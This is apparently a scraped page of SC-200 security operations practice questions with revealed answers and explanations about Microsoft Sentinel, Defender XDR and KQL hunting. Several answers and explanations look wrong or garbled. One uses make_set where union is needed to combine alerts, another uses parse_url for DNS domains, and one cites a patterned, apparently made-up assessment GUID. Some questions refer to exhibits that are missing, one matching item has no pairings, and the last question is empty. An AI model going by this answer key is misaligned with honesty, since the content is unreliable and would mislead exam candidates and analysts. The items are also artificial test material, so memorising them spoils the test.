Microsoft Security Operations Analyst SC-200 (SC-200) — Questions 9761050

1639 questions total · 22pages · All types, answers revealed


Page 14 of 22

976
MCQ · easy

A threat hunter wants to identify all devices that have communicated with a known malicious IP address in the last 7 days. Which table in Microsoft Defender for Endpoint advanced hunting should be queried?

A. DeviceFileEvents
B. DeviceNetworkEvents
C. DeviceProcessEvents
D. DeviceRegistryEvents
Answer: B

This table contains network connection events.

Why this answer

DeviceNetworkEvents records network connections, including destination IP addresses.

977
Multi-Select · medium

Which TWO of the following are effective techniques for identifying lateral movement in Microsoft Defender for Endpoint advanced hunting? (Choose two.)

Select 2 answers
A. Check for successful logons from public IP addresses
B. Look for large file uploads to cloud storage
C. Search for remote desktop connections from non-administrative workstations
D. Monitor for phishing emails
E. Analyze NTLM authentication events for pass-the-hash
Answers: C, E

Unexpected RDP connections from workstations can indicate lateral movement.

Why this answer

Option C is correct because anomalous RDP connections can indicate lateral movement. Option E is correct because pass-the-hash can be detected via logon events. Option A is wrong because it is about initial access.

Option B is wrong because it is about data exfiltration. Option D is wrong because it is not a lateral movement technique.

978
MCQ · medium

You are analyzing a firewall policy in Azure Firewall deployed via Azure Policy. What is the effect of this rule?

A. Allows outbound traffic from any source to IP 10.0.0.5.
B. Allows inbound traffic from IP 10.0.0.5 to any destination.
C. Denies inbound traffic from IP 10.0.0.5 to any destination.
D. Denies outbound traffic from any source to IP 10.0.0.5.
Answer: C

The rule denies inbound traffic from the specified source IP.

Why this answer

Option C is correct because the rule denies inbound traffic from IP 10.0.0.5 to any destination. Options A and B are wrong because the rule denies traffic, it does not allow it.

Option D is wrong because the direction is inbound, not outbound.

979
Multi-Select · easy

You are investigating a security incident involving a compromised user account. The attacker used the account to access sensitive data in SharePoint Online. Which TWO actions should you take to remediate the incident? (Choose two.)

Select 2 answers
A. Reset the user's password.
B. Revoke all refresh tokens for the user.
C. Disable the user account in Microsoft Entra ID.
D. Review the sign-in logs to determine the extent of the breach.
E. Create a Conditional Access policy to require MFA for the user.
Answers: B, C

Revoking tokens terminates active sessions.

Why this answer

Options B and C are correct. Disabling the account immediately stops further access. Revoking tokens ensures the attacker's current sessions are terminated.

Option D is wrong because reviewing sign-in logs is investigation, not remediation. Option A is wrong because resetting the password is good but may not kill active sessions without revocation. Option E is wrong because creating a Conditional Access policy is a long-term preventive measure, not immediate remediation.

980
MCQ · medium

You are investigating a security incident in Microsoft Sentinel. You need to preserve a snapshot of the investigation including comments, bookmarks, and entities for future reference. What should you do?

A. Create an automation rule to tag the incident
B. Create a bookmark with the relevant data
C. Add the entities to a watchlist
D. Close the incident as a false positive
Answer: B

Bookmarks capture query results, comments, and entities for later use.

Why this answer

Option B is correct because bookmarks in Microsoft Sentinel allow you to preserve a snapshot of an investigation, including comments, bookmarks, and entities, for future reference. Bookmarks capture the state of an investigation at a specific point in time, enabling you to revisit and share the context later.

Exam trap

The trap here is that candidates often confuse bookmarks with watchlists or automation rules, thinking that static data storage or automated actions can preserve an investigation snapshot, but only bookmarks capture the full interactive context including comments and entities.

How to eliminate wrong answers

Option A is wrong because automation rules are used to automate incident response actions (e.g., assigning, changing severity, or triggering playbooks) and do not preserve a snapshot of investigation data like comments and entities. Option C is wrong because watchlists are used to store static data for correlation and matching against events, not to capture a dynamic investigation snapshot with comments and bookmarks. Option D is wrong because closing an incident as a false positive dismisses it without preserving the investigation context; it does not create a persistent record of comments, bookmarks, or entities.

981
Multi-Select · easy

Which TWO Microsoft Sentinel hunting features can be used to automatically surface suspicious activities without manual query writing?

Select 2 answers
A. Workbooks
B. Analytics rules
C. Livestream
D. Playbooks
E. Hunting queries
Answers: C, E

Livestream provides real-time hunting by monitoring specific events.

Why this answer

Hunting queries are pre-built queries that run on a schedule. Livestream allows real-time detection of specific events. Option B (Analytics rules) is for detection, not hunting.

Option A (Workbooks) is visualization. Option D (Playbooks) is automation. The correct options are C and E.

982
Multi-Select · easy

Which TWO are valid KQL operators for performing time-based analysis in threat hunting? (Choose two.)

Select 2 answers
A. project
B. between
C. summarize
D. extend
E. ago()
Answers: B, E

between filters results within a datetime range.

Why this answer

Option E is correct because 'ago' is used to specify a relative time range. Option B is correct because 'between' is used to filter a column between two datetime values. Option D is wrong because 'extend' creates new columns and is not time-based.

Option A is wrong because 'project' selects columns. Option C is wrong because 'summarize' aggregates data.

983
MCQ · easy

Your organization uses Microsoft Defender for Office 365. You need to ensure that when a user reports a phishing email, the email is automatically analyzed and remediated. What should you configure?

A. Configure User Reported Message settings to use the built-in reporting tool and automated investigation.
B. Configure Anti-Phish policy to move messages to quarantine.
C. Enable Safe Attachments policy.
D. Enable Safe Links policy.
Answer: A

User reported message settings handle reported emails.

Why this answer

Option A is correct because the User Reported Message settings in Defender for Office 365 allow you to configure what happens when users report messages, including automated investigation and remediation. Option C is wrong because Safe Attachments is for scanning attachments. Option D is wrong because Safe Links is for URL protection.

Option B is wrong because Anti-Phish policies detect phishing but don't handle user reports.

984
MCQ · hard

You are responsible for Microsoft Sentinel pricing. You notice that data ingestion costs are high due to verbose logs from Windows security events. You need to reduce costs while still collecting critical security events. What should you do?

A. Use Common Event Format (CEF) connector instead of Windows Events
B. Change the table plan to Basic Logs
C. Increase the workspace retention period to archive warm data
D. Configure Windows Security Events via AMA connector with event filtering
Answer: D

Filter logs at source to reduce volume.

Why this answer

Option D is correct because the Azure Monitor Agent (AMA) connector for Windows Security Events allows granular filtering of event IDs and levels, enabling you to collect only critical security events (e.g., 4624, 4625) while excluding verbose logs like Event ID 5156 (Windows Filtering Platform permit connections). This reduces ingestion volume and cost without losing essential security visibility.

Exam trap

The trap here is that candidates confuse 'reducing costs' with 'changing retention' (Option C) or 'using a different connector' (Option A), when the real solution is to filter data at the source using the AMA's event filtering capability, which directly addresses ingestion volume.

How to eliminate wrong answers

Option A is wrong because the Common Event Format (CEF) connector is used for syslog-based appliances (e.g., firewalls, network devices), not for Windows Security Events; it does not reduce costs from Windows event logs. Option B is wrong because changing the table plan to Basic Logs reduces the log retention and query capabilities (no KQL full-text search, limited analytics), which is unsuitable for security events that require advanced hunting and detection rules. Option C is wrong because increasing the workspace retention period to archive warm data actually increases storage costs (warm data is interactive, not archived) and does not reduce ingestion costs; archiving cold data would reduce costs but is not relevant to ingestion volume.

985
MCQ · hard

You are reviewing a custom hunting query in Microsoft Sentinel. The query above returns results, but you suspect it misses low-frequency beaconing. Which modification improves detection while reducing false positives?

A. Use a sliding window to count distinct connection times per IP per device
B. Group by DeviceName only
C. Decrease the count threshold to 10
D. Add RemotePort to the summarize clause
Answer: A

Better captures regular intervals of beaconing.

Why this answer

Option A is correct because time-bounded connections better detect regular beaconing. Option C increases false positives. Option D only adds columns.

Option B counts per device, missing cross-device patterns.

986
MCQ · easy

A threat hunter wants to identify possible data exfiltration over DNS in Microsoft Sentinel. Which KQL function should the analyst use to extract domain names from DNS queries?

A. split
B. parse_url
C. extract_all
D. substring
Answer: B

parse_url parses a URL and returns its components, including host.

Why this answer

Option B is correct because parse_url extracts URL components, including hostname, from a string. Option C is wrong because extract_all is a more general regex function. Option A is wrong because split is for splitting strings, not parsing URLs.

Option D is wrong because substring is for simple substring extraction.

987
MCQ · medium

In Microsoft 365 Defender, a security analyst reviews an automated investigation that found a potentially unwanted application on multiple devices. The analyst wants to manually approve the suggested remediation action of uninstalling the application. Where should the analyst go?

A. The Action center
B. The Incidents page
C. The Alerts queue
D. The Device inventory
Answer: A

The Action center displays pending and completed actions from automated investigations, allowing analysts to approve or reject them.

Why this answer

The Action center in Microsoft 365 Defender is the centralized location where security analysts can view and manually approve or reject remediation actions that were suggested by automated investigations, such as uninstalling a potentially unwanted application. This is the correct place because the Action center consolidates all pending and completed actions across devices, allowing the analyst to take direct manual intervention on the recommended remediation.

Exam trap

The trap here is that candidates often confuse the Incidents page or Alerts queue as the place to approve remediation actions, not realizing that the Action center is the sole interface for managing pending remediation actions from automated investigations.

How to eliminate wrong answers

Option B is wrong because the Incidents page is used to view and manage the full scope of an incident, including alerts, devices, and evidence, but it does not provide the interface to manually approve or reject specific remediation actions like uninstalling an application. Option C is wrong because the Alerts queue lists individual security alerts, but it does not show the suggested remediation actions from automated investigations; those actions are only visible and actionable in the Action center. Option D is wrong because the Device inventory shows the list of devices and their details, but it does not contain the pending remediation actions or the ability to approve them; it is purely an inventory view.

988
MCQ · easy

Your organization uses Microsoft Sentinel to manage security incidents. The security team wants to automatically close low-severity incidents after 24 hours if no activity has occurred. Which feature should you use?

A. Playbooks
B. Automation rules
C. Watchlists
D. Analytics rules
Answer: B

Automation rules can close incidents based on conditions.

Why this answer

Option B is correct because automation rules can automatically close incidents based on conditions like severity and time since last update. Option A is wrong because playbooks are for complex actions, whereas automation rules are the simpler fit here. Option D is wrong because analytics rules generate incidents; they don't close them.

Option C is wrong because watchlists are not used for incident lifecycle.

989
MCQ · hard

Your SOC uses Microsoft Sentinel and Microsoft Defender for Identity (MDI). You have configured MDI to send alerts to Microsoft 365 Defender. From there, Microsoft Sentinel ingests the alerts via the Microsoft 365 Defender connector. You want to ensure that when MDI detects a suspicious activity, the incident in Microsoft Sentinel is created within 5 minutes. Which factors should you consider?

A. The latency is determined solely by the MDI sensor health and network speed.
B. The incident creation time is controlled by the Microsoft Defender for Cloud Apps connector.
C. The incident will be created within 5 minutes because MDI writes directly to Microsoft Sentinel.
D. The latency depends on the Microsoft 365 Defender connector's polling interval and the analytics rule's frequency.
Answer: D

The connector polls every few minutes, and the analytics rule runs on a schedule.

Why this answer

Option D is correct because the incident creation latency in this architecture depends on two factors: the Microsoft 365 Defender connector's polling interval (which retrieves alerts from Microsoft 365 Defender) and the frequency of the Microsoft Sentinel analytics rule that creates incidents from those ingested alerts. Even if MDI sends alerts quickly to Microsoft 365 Defender, the connector polls at a configurable interval (default every 5 minutes), and the analytics rule runs on its own schedule (typically every 5 minutes). Thus, the total time to incident creation is the sum of these intervals, not a fixed 5 minutes.

Exam trap

The trap here is that candidates assume MDI alerts flow directly into Microsoft Sentinel with minimal delay, overlooking the polling-based Microsoft 365 Defender connector and the scheduled analytics rule that together introduce cumulative latency.

How to eliminate wrong answers

Option A is wrong because latency is not solely determined by MDI sensor health and network speed; the Microsoft 365 Defender connector's polling interval and analytics rule frequency are the primary bottlenecks. Option B is wrong because the Microsoft Defender for Cloud Apps connector is not involved in this alert flow; MDI alerts go to Microsoft 365 Defender, not directly to Defender for Cloud Apps. Option C is wrong because MDI does not write directly to Microsoft Sentinel; alerts flow through Microsoft 365 Defender and the Microsoft 365 Defender connector, which introduces polling and rule processing delays.

990
MCQ · hard

Your organization uses Microsoft Sentinel with the Microsoft Defender XDR connector. You have a critical incident that involves multiple alerts across different services. The incident is being updated with new alerts. You need to ensure that a specific playbook runs only when the incident severity is updated to High. How should you configure the automation rule?

A. Set the trigger to 'When an alert is created' and filter for alerts with High severity.
B. Set the trigger to 'When incident is updated' and add a condition on severity equals High.
C. Set the trigger to 'When incident is created' and add a condition on severity equals High.
D. Configure the condition inside the playbook to check severity and exit if not High.
Answer: B

This triggers the playbook only when the incident is updated to High severity.

Why this answer

Option B is correct because automation rules can trigger on incident update and filter by severity. Option C is wrong because the trigger 'When incident is created' would not fire on update. Option A is wrong because the trigger should be on incident update, not alert creation.

Option D is wrong because automation rules are not configured inside playbooks.

991
MCQ · hard

You deploy the above ASR rule in Microsoft Defender for Endpoint. After deployment, you notice that .exe files are still being executed from Outlook attachments. What is the most likely reason?

A. The rule only applies when the initiating process is outlook.exe, but the attachment may be launched from another process.
B. The rule does not block .vbs files, which are also commonly used in attacks.
C. The ASR rule is configured in audit mode instead of block mode.
D. The rule is not applied because fileExtension is not a supported field in ASR rules.
Answer: C

ASR rules need to be set to 'block' mode to actually block execution; otherwise they only generate audit events.

Why this answer

Option C is correct because ASR rules require the enforcement mode to be set to 'block' or 'audit' via the tenant's security settings; the policyContent snippet shows the rule definition but does not specify the enforcement mode. The default mode is audit, so the rule only logs events without blocking. Option B is wrong because the rule targets file extensions, not script files.

Option A is wrong because the rule targets the initiating process outlook.exe, not all processes. Option D is wrong because the rule is correctly formatted for ASR.

992
MCQ · medium

A company uses Microsoft Defender for Cloud to protect an Azure Kubernetes Service (AKS) cluster. The security team wants to receive security alerts about suspicious activities within the cluster, such as a container running with root privileges or attempts to read sensitive host paths. Which Defender for Cloud plan must be enabled to generate these alerts?

A. Defender for Servers
B. Defender for Containers
C. Defender for Cloud Apps
D. Defender for SQL
Answer: B

Defender for Containers provides threat detection and alerts for AKS clusters, including runtime behaviors.

Why this answer

Defender for Containers is the specific plan that provides threat detection for Azure Kubernetes Service (AKS) clusters, including alerts for suspicious activities such as containers running with root privileges or attempts to read sensitive host paths. This plan monitors the Kubernetes control plane and container runtime to generate security alerts based on Kubernetes audit logs and container-specific signals.

Exam trap

The trap here is that candidates often confuse Defender for Servers with container protection because they think containers run on servers, but Defender for Servers does not monitor Kubernetes audit logs or container runtime activities, which are essential for detecting the described alerts.

How to eliminate wrong answers

Option A is wrong because Defender for Servers is designed to protect virtual machines and on-premises servers, not container orchestration platforms like AKS; it does not ingest Kubernetes audit logs or container runtime events. Option C is wrong because Defender for Cloud Apps is a cloud access security broker (CASB) that focuses on SaaS application usage and shadow IT, not on container or Kubernetes-level threats. Option D is wrong because Defender for SQL is dedicated to protecting Azure SQL databases and SQL servers, providing alerts for SQL injection and database anomalies, not for container or Kubernetes security events.

993
MCQ · hard

A Microsoft Defender XDR incident shows that a user's device has been communicating with a known malicious C2 server. The device is online and the user is actively working. You need to contain the threat with minimal business disruption. What should you do?

A. Remove the device from the network by disabling the switch port
B. Shut down the device remotely
C. Run a full antivirus scan on the device
D. Initiate device isolation from Microsoft Defender XDR
Answer: D

Isolation blocks network traffic except to Microsoft services, minimizing disruption.

Why this answer

Option D is correct because isolating the device stops communication while allowing the user to continue work if they switch to another device. Option B is wrong because shutting down the device causes immediate disruption. Option A is wrong because removing network connectivity may not be possible remotely.

Option C is wrong because running an antivirus scan does not stop ongoing C2 communication.

994
MCQ · easy

You are responding to an incident where a user's device may be compromised. You need to collect forensic data from the device using Microsoft Defender for Endpoint. Which action should you take?

A. Isolate device
B. Initiate Live Response
C. Collect investigation package
D. Run antivirus scan
Answer: C

The investigation package gathers forensic data.

Why this answer

Option C is correct because 'Collect investigation package' gathers forensic data. Option B is wrong because 'Initiate Live Response' is a live remote shell, not just data collection. Option D is wrong because 'Run antivirus scan' is for malware detection.

Option A is wrong because 'Isolate device' is for containment.

995
MCQ · medium

You are a security operations analyst at a company that uses Microsoft Sentinel. You have enabled User and Entity Behavior Analytics (UEBA) to detect anomalies. A new alert fires indicating a user is logging in from an unusual location. However, the user is a known traveler. How can you reduce false positives without disabling the UEBA rule?

A. Add the user to the entity behavior analytics exclusion list.
B. Disable the UEBA anomaly rule for unusual locations.
C. Change the alert severity to Informational.
D. Increase the lookback period for the anomaly detection.
Answer: A

Exclusion list prevents alerts for that user while keeping the rule active.

Why this answer

Option A is correct because Microsoft Sentinel's UEBA allows you to add specific users to an entity behavior analytics exclusion list. This prevents the UEBA engine from generating alerts for that user's anomalous activities, such as logins from unusual locations, without disabling the underlying detection rule. This approach maintains detection coverage for other users while suppressing false positives for known travelers.

Exam trap

The trap here is that candidates may think disabling the rule or changing severity is the correct approach, but Microsoft specifically tests the ability to use entity-level exclusions to handle known exceptions without compromising overall detection coverage.

How to eliminate wrong answers

Option B is wrong because disabling the UEBA anomaly rule for unusual locations would stop all alerts for that anomaly type across all users, not just the known traveler, which is an overly broad and disruptive solution. Option C is wrong because changing the alert severity to Informational does not prevent the alert from being generated; it only changes its classification, so false positives would still clutter the security operations queue. Option D is wrong because increasing the lookback period for anomaly detection would make the UEBA model consider older baseline data, potentially making the detection less sensitive to recent changes and not specifically addressing the false positive for a single known traveler.

996
MCQ · hard

You are investigating a ransomware incident in Microsoft Sentinel. The incident contains multiple alerts from Microsoft Defender for Endpoint, Microsoft Defender for Office 365, and Microsoft Defender for Identity. You need to correlate the alerts and identify the initial entry point. Which KQL function should you use to combine the alerts?

A. materialize()
B. union
C. mv-expand
D. make_set()
Answer: D

make_set() creates an array of unique values, ideal for aggregating alert titles for correlation.

Why this answer

Option D is correct because the make_set function creates an array of unique values from an expression, which is useful for aggregating alert titles. Option A is wrong because materialize is for caching query results. Option C is wrong because the mv-expand operator expands multi-value arrays.

Option B is wrong because the union operator combines tables, which is not useful for correlating within a single table.

997
MCQ · medium

A security analyst is investigating a suspicious email that was reported by a user. The email contains an attachment with a known malicious macro. The analyst wants to find all instances of this same email being delivered to other users in the organization. Which Advanced Hunting table should the analyst query to find the delivery events?

A. EmailAttachmentInfo
B. EmailEvents
C. EmailUrlInfo
D. DeviceFileEvents
Answer: B

EmailEvents contains the delivery records, including the recipient addresses and delivery status. It can be filtered or joined with attachment data to find all recipients.

Why this answer

The EmailEvents table in Microsoft Defender XDR Advanced Hunting contains records of email delivery events, including sender, recipient, subject, and delivery status. Since the analyst needs to find all instances where the same email (with the malicious macro attachment) was delivered to other users, querying EmailEvents with the email's unique identifier (e.g., NetworkMessageId) will return all delivery events across the organization.

Exam trap

The trap here is that candidates confuse EmailAttachmentInfo (which contains attachment hashes) with EmailEvents, assuming attachment data alone can identify all recipients, but only EmailEvents holds the delivery event records needed to find every user who received the email.

How to eliminate wrong answers

Option A is wrong because EmailAttachmentInfo stores metadata about attachments (e.g., filename, SHA256 hash) but does not include delivery event details like recipient or delivery status; it is used to correlate attachments with emails, not to find delivery instances. Option C is wrong because EmailUrlInfo contains information about URLs in the email body or attachments, not delivery events; it is used for phishing URL investigations, not for locating all recipients of a specific email. Option D is wrong because DeviceFileEvents tracks file creation, modification, and deletion events on endpoints, not email delivery events; it is irrelevant for finding email recipients.

998
MCQ · medium

Your organization, Fabrikam, has a hybrid environment with on-premises Active Directory and Microsoft Entra ID. You are using Microsoft Sentinel and Microsoft Defender XDR. You have enabled Microsoft Defender for Identity (MDI) to protect on-premises Active Directory. Recently, you received an incident in Microsoft Sentinel indicating a potential DCSync attack from a domain controller. The incident was generated from an MDI alert. You need to investigate the incident and determine if the attack was successful. Which option should you choose?

A. Use the Microsoft Sentinel workbook for MDI to visualize the attack timeline.
B. Use the Microsoft Defender XDR advanced hunting to query the IdentityLogonEvents table for the domain controller.
C. Use the Microsoft Sentinel incident investigation graph to view entities and relationships. Then query the IdentityDirectoryEvents table for the domain controller to see if any directory replication requests were made.
D. Use the Microsoft Defender for Cloud Apps activity log to review the domain controller's activities.
Answer: C

The investigation graph helps identify related entities, and IdentityDirectoryEvents contains the necessary replication events.

Why this answer

Option C is correct because a DCSync attack involves an attacker impersonating a domain controller to request directory replication via the MS-DRSR protocol. The IdentityDirectoryEvents table in Microsoft Defender for Identity captures directory service replication activities, including the DirectoryReplication request action. Querying this table for the domain controller allows you to confirm if unauthorized replication requests were made, directly indicating a successful DCSync attack.

Exam trap

The trap here is that candidates may confuse the IdentityLogonEvents table (logon events) with the IdentityDirectoryEvents table (directory service events), or assume a visualization workbook can replace direct querying for forensic evidence of a DCSync attack.

How to eliminate wrong answers

Option A is wrong because the Microsoft Sentinel workbook for MDI provides visualizations and timelines but does not allow direct querying of the IdentityDirectoryEvents table to confirm specific replication requests; it is a reporting tool, not an investigative query tool. Option B is wrong because the IdentityLogonEvents table tracks authentication events (logons), not directory replication activities; DCSync attacks are not logon events but directory service replication requests. Option D is wrong because Microsoft Defender for Cloud Apps activity log focuses on cloud application activities, not on-premises Active Directory replication events; it would not capture MS-DRSR replication requests from a domain controller.

999
MCQ · hard

Your organization uses Microsoft Sentinel with a Log Analytics workspace in the East US region. You have deployed the Microsoft Defender for Cloud connector. You notice that security alerts from Defender for Cloud are not appearing as incidents in Sentinel. You have confirmed that the connector is enabled and data is flowing. What is the most likely cause?

A. The Sentinel workspace does not have required permissions to create incidents.
B. There is a delay in incident creation; wait for 24 hours.
C. You need to create an analytics rule with a rule template that uses the SecurityAlert table.
D. The Microsoft Defender for Cloud connector is not properly configured.
Answer: C

Sentinel requires analytics rules to generate incidents from incoming alerts. The connector only ingests the alerts.

Why this answer

Option C is correct because analytics rules must be created to generate incidents from alerts. Option D is wrong because the connector is working. Option B is wrong because incident creation is not automatic from the connector alone.

Option A is wrong because permissions are not the issue if data is flowing.

1000
MCQ · medium

A security analyst in Microsoft Sentinel is creating a scheduled analytics rule to detect multiple failed logon attempts from the same source IP address. The rule should generate an incident only when the count of failed logons exceeds 10 within a 5-minute window. Which configuration setting is essential to limit the incident generation to this threshold?

A.Event grouping set to 'Group all events into a single alert'
B.Alert threshold set to a value of 10
C.Query scheduling set to run every 5 minutes
D.Entity mapping for source IP address
AnswerB

The alert threshold specifies the minimum number of query results needed to generate an incident, ensuring only high-count patterns trigger alerts.

Why this answer

The alert threshold setting in a Microsoft Sentinel scheduled analytics rule directly controls the minimum number of query results required to generate an incident. By setting the threshold to 10, the rule will only fire when the query returns more than 10 failed logon events within the 5-minute window, matching the requirement exactly.

Exam trap

The trap here is confusing the alert threshold with query scheduling or event grouping, leading candidates to think that setting the run interval to 5 minutes alone ensures the threshold is met, when in fact the threshold is a separate mandatory configuration.

How to eliminate wrong answers

Option A is wrong because 'Group all events into a single alert' controls how matching events are bundled into one alert, not the count threshold for triggering an incident. Option C is wrong because query scheduling set to run every 5 minutes defines the evaluation frequency, not the threshold for the number of failed logons. Option D is wrong because entity mapping for source IP address is used to enrich alerts with entity information for investigation, not to limit incident generation based on event count.

1001
Matchingmedium

Match each incident severity level to its description in Microsoft 365 Defender.

Matches

No impact, but may indicate an issue

Minimal impact, likely false positive

Potential impact, requires investigation

Significant impact, immediate action needed

Widespread impact, urgent response required

Why these pairings

Severity levels help prioritize incident response.

1002
MCQhard

Your company uses Microsoft Sentinel and has enabled the Microsoft Defender XDR connector. You notice that incidents from Microsoft Defender for Cloud Apps are not appearing in Microsoft Sentinel. All other Defender XDR incidents appear correctly. What is the most likely cause?

A.The security operations team does not have the appropriate permissions.
B.The Microsoft Defender XDR connector only ingests incidents from Microsoft Defender for Endpoint.
C.The Microsoft 365 E5 license is not assigned to the users.
D.The Microsoft Defender for Cloud Apps data connector is not enabled in Microsoft Sentinel.
AnswerD

You need to enable the Microsoft Defender for Cloud Apps connector separately to ingest its incidents.

Why this answer

Microsoft Defender for Cloud Apps incidents are ingested into Microsoft Sentinel via the Microsoft Defender XDR connector, but only if the data connector for Microsoft Defender for Cloud Apps is also enabled separately in Sentinel. Option D is correct. Option C is wrong because license requirements apply to other connectors.

Option A is wrong because roles are not the issue. Option B is wrong because the connector is for Defender XDR as a whole, not for Defender for Endpoint specifically.

1003
Multi-Selectmedium

Which TWO actions should you take to optimize cost in Microsoft Sentinel while maintaining security coverage? (Choose two.)

Select 2 answers
A.Enable continuous export for all tables.
B.Purchase a Pay-as-you-go commitment tier.
C.Adjust the interactive retention period for tables that don't need long-term interactive access.
D.Add more tables to ingest data.
E.Use Basic Logs for high-volume, low-value data sources.
AnswersC, E

Reduces storage cost.

Why this answer

Option C is correct because reducing interactive retention for tables that do not require long-term, fast query access directly lowers storage costs. Microsoft Sentinel charges per GB for data stored in the interactive retention tier, while data moved to long-term retention (up to 12 years) is significantly cheaper. By tailoring retention periods to actual operational needs, you avoid paying premium rates for data that is rarely queried interactively.

Exam trap

The trap here is that candidates often confuse 'commitment tiers' (which reduce per-GB cost) with a direct cost-optimization action, but the question asks for specific actions you take, not pricing models; also, 'continuous export' sounds like a way to offload data, but it actually adds cost and complexity unless used for a specific purpose.

1004
MCQhard

A large enterprise uses Microsoft Defender for Cloud with the integrated Microsoft Defender Vulnerability Management solution enabled for all servers. The security team wants to identify all virtual machines that have not been scanned for vulnerabilities in the last 7 days. They plan to use Azure Resource Graph (ARG) to generate a report. Which KQL query would correctly identify these machines?

A.securityresources | where type =~ 'microsoft.security/assessments' and name == '4da3e7e8-0e4b-4c5e-8e0a-7e8f4e8e4e8e' | where properties.status.code == 'Unhealthy' and properties.status.firstEvaluationDate < ago(7d)
B.resources | where type =~ 'microsoft.compute/virtualmachines' | where properties.storageProfile.osDisk.managedDisk.id != ''
C.securityresources | where type =~ 'microsoft.security/regulatorycompliancestandards'
D.resources | where type =~ 'microsoft.security/securitystatuses'
AnswerA

This query filters for the specific vulnerability assessment and checks if the last scan (firstEvaluationDate) is older than 7 days or not present.

Why this answer

Option A is correct because it queries the `securityresources` table for the specific vulnerability assessment type (`microsoft.security/assessments`) and filters for the vulnerability assessment result named with the GUID `4da3e7e8-0e4b-4c5e-8e0a-7e8f4e8e4e8e`, which corresponds to the 'Vulnerabilities in your virtual machines should be remediated' assessment. It then checks that the status code is 'Unhealthy' (indicating vulnerabilities were found) and that the `firstEvaluationDate` is older than 7 days, which identifies machines that have not been scanned recently.

Exam trap

The trap here is that candidates often confuse the `firstEvaluationDate` with the last scan time, but in this context, an outdated `firstEvaluationDate` on an 'Unhealthy' assessment correctly identifies machines that have not been rescanned recently, whereas a healthy assessment would have been updated more frequently.

How to eliminate wrong answers

Option B is wrong because it queries the `resources` table for virtual machines with a managed disk, which does not relate to vulnerability scanning recency at all. Option C is wrong because it queries `microsoft.security/regulatorycompliancestandards`, which tracks compliance with regulatory standards (e.g., ISO, NIST) and not vulnerability scan status. Option D is wrong because `microsoft.security/securitystatuses` is a deprecated table that does not contain vulnerability assessment scan timestamps or the specific assessment results needed for this query.

1005
MCQmedium

A SOC analyst is configuring an analytics rule in Microsoft Sentinel. The rule should run every hour and check for sign-ins from users who have been inactive for more than 30 days. The analyst uses the SigninLogs and IdentityInfo tables. Which KQL query pattern should be used to identify these users?

A.union IdentityInfo, SigninLogs | where TimeGenerated > ago(30d) | summarize by UserPrincipalName
B.IdentityInfo | join kind=leftanti (SigninLogs | where TimeGenerated > ago(30d)) on UserPrincipalName
C.SigninLogs | where TimeGenerated > ago(30d) | summarize by UserPrincipalName | join kind=rightanti IdentityInfo on UserPrincipalName
D.SigninLogs | where TimeGenerated < ago(30d) | summarize by UserPrincipalName
AnswerB

Correct. The left anti join returns all rows from IdentityInfo that do not have a matching UserPrincipalName in the recent SigninLogs, effectively finding inactive users.

Why this answer

Option B is correct because it uses a `leftanti` join to return all rows from the `IdentityInfo` table that have no matching `UserPrincipalName` in the `SigninLogs` table for the last 30 days. This directly identifies users who are in the identity inventory but have not signed in within the past 30 days, which is the exact requirement for detecting inactive users.

Exam trap

The trap here is that candidates often confuse `leftanti` with `rightanti` or `leftouter` joins, mistakenly thinking that summarizing sign-ins first and then joining will correctly identify inactive users, when in fact the direction of the anti-join determines which table's unmatched rows are returned.

How to eliminate wrong answers

Option A is wrong because it uses `union` to combine the two tables and then filters for sign-ins within 30 days, which would include all users who have signed in recently and miss the inactive users entirely. Option C is wrong because it uses a `rightanti` join, which returns rows from the right table (`IdentityInfo`) that have no match in the left table (`SigninLogs`), but the query first summarizes sign-ins from the last 30 days, so the join would incorrectly return users who have signed in recently as inactive. Option D is wrong because it filters `SigninLogs` for sign-ins older than 30 days (`TimeGenerated < ago(30d)`), which would return historical sign-ins rather than identifying users with no recent sign-ins at all.

1006
MCQmedium

You are responding to a phishing incident. The investigation reveals that a user clicked a link in a phishing email and entered credentials on a fake site. You need to contain the incident and prevent further compromise. What should you do first?

A.Report the phishing site to Microsoft.
B.Block the phishing URL in Microsoft Defender for Office 365.
C.Reset the user's password and revoke sessions.
D.Delete the phishing email from the user's mailbox.
AnswerC

This invalidates the stolen credentials and existing sessions.

Why this answer

Option C is correct because resetting the compromised user's password immediately prevents further access using the stolen credentials. Option B is wrong because blocking the URL does not invalidate already stolen credentials. Option D is wrong because deleting the email from the user's mailbox does not prevent use of the stolen credentials.

Option A is wrong because reporting the site to Microsoft is reactive.

1007
MCQmedium

Your Microsoft 365 tenant is protected by Microsoft Defender for Office 365. A user reports receiving a suspicious email with a link. You need to investigate whether the link was malicious and if any other users clicked it. Which tool should you use first?

A.Microsoft Entra ID sign-in logs
B.Microsoft Purview compliance portal
C.Email Entity page in Microsoft Defender XDR
D.Threat Explorer
E.Attack Simulation Training
AnswerD

Provides detailed email threat data including URL clicks.

Why this answer

Threat Explorer allows investigation of email threats, including URLs and user clicks. The others are for other purposes.

1008
MCQmedium

A SOC analyst wants to automate a response in Microsoft Sentinel: whenever an incident is created that contains a compromised user entity (e.g., a user whose credentials were used in a breach), a playbook should run to disable that user in Microsoft Entra ID. Which condition should be configured in the automation rule to trigger this playbook?

A.Set the trigger to 'When incident is created' with no additional condition.
B.Set the condition to 'When incident is created with entity type IP'.
C.Set the condition to 'When incident is created with entity type Account'.
D.Set the condition to 'When incident is updated with entity type Host'.
AnswerC

The Account entity type represents user accounts. This condition ensures the playbook runs only on incidents that include a user entity, which is appropriate for disabling a compromised user.

Why this answer

Option C is correct because the automation rule must trigger when an incident is created with an entity type of 'Account' to match the compromised user entity. In Microsoft Sentinel, a user whose credentials were used in a breach is represented as an 'Account' entity, not an 'IP' or 'Host'. The playbook to disable the user in Microsoft Entra ID requires this entity type to pass the user principal name (UPN) or object ID to the action.

Exam trap

The trap here is that candidates often confuse 'Account' with 'User' or assume 'IP' is sufficient for user compromise, but Microsoft Sentinel uses the specific entity type 'Account' for user identities, and the automation rule condition must match exactly that type to trigger the playbook correctly.

How to eliminate wrong answers

Option A is wrong because setting the trigger to 'When incident is created' with no additional condition would run the playbook on every incident, regardless of whether it contains a compromised user entity, leading to unnecessary or incorrect executions. Option B is wrong because 'entity type IP' represents an IP address, not a user account; disabling an IP address in Microsoft Entra ID is not a valid action for user compromise. Option D is wrong because 'entity type Host' represents a device or computer, not a user account, and the condition 'When incident is updated' would not capture the initial creation of the incident containing the compromised user.

1009
MCQhard

